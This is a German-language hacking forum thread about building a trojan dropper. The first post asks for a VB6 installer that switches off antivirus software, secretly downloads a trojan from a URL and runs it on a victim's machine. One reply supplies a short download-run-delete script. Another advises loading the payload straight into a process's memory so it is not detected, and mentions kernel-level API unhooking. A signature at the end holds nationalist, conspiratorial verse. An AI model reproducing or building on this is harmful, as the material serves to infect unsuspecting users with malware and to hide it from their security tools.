Trojaner Installer

  • [CENTER]Also ich habe da eine Idee.Einen Installer in Vb6 der 1.) Antivirus systeme ausschaltet dann von einer folgenen url einen Trojaner Herunterladet.(Bsp: http://google.de/Server.exe) so bemerkt das opfer nicht das es einen trojaner herunterladet und zum abschluss startet der installer den trojaner. Also wenn mir jemand helfen würde wär ich sehr dankbar.Und achja nur zur info: ich könnte das design übernehmen weil naja in vb6 bin ich nicht wirklich der beste.
    Edit: Und achja wenn das projekt erfolkreich abgeschlossen ist würde ich auch einen trojaner installer builder machen^^
    [/CENTER]

  • naja, das nennt man WebDownloader, und naja soo super neu ist das nicht.


    In Bash wäre es sowas (weil Batch kein wget hat)

    Code
    1. wget http://google.de/server.exe
    2. sh server.exe (oder) start server.exe
    3. del /f /q server.exe
    4. del /f /q $1


    Dies soll auf gut deutsch heiÃ?en, du musst nur ein File Downloaden und es dann mit Shell_Execute starten

  • Hört sich kiddiemäÃ?ig an.
    AuÃ?erdem ist das "ausschalten" von AntivirenSystemen nicht so einfach wie du denkst(bei einigen brauchste einen API Unhook auf Kernelebene).
    Und warum die ganze sache wenn du die Datei direkt in eine variable einspeichern kannst und danach ohne zu droppen in einen Prozess mappst? Da wirds dann auch nicht erkannt.




    Du sagst, du spürst die Ohnmacht, denn der Feind ist ach so stark
    Und er will dich niederhalten mit Geschrei durch Bein und Mark
    Mit Verboten und Zensur kann er zwar den Kampf erschweren
    Doch niemals wird ein Richterspruch den freien Geist bekehren.


    Fürchte lieber Deutschlands Untergang als die Reden der Vasallen
    Derer, die der Lüge dienen, denn schon bald werden sie fallen.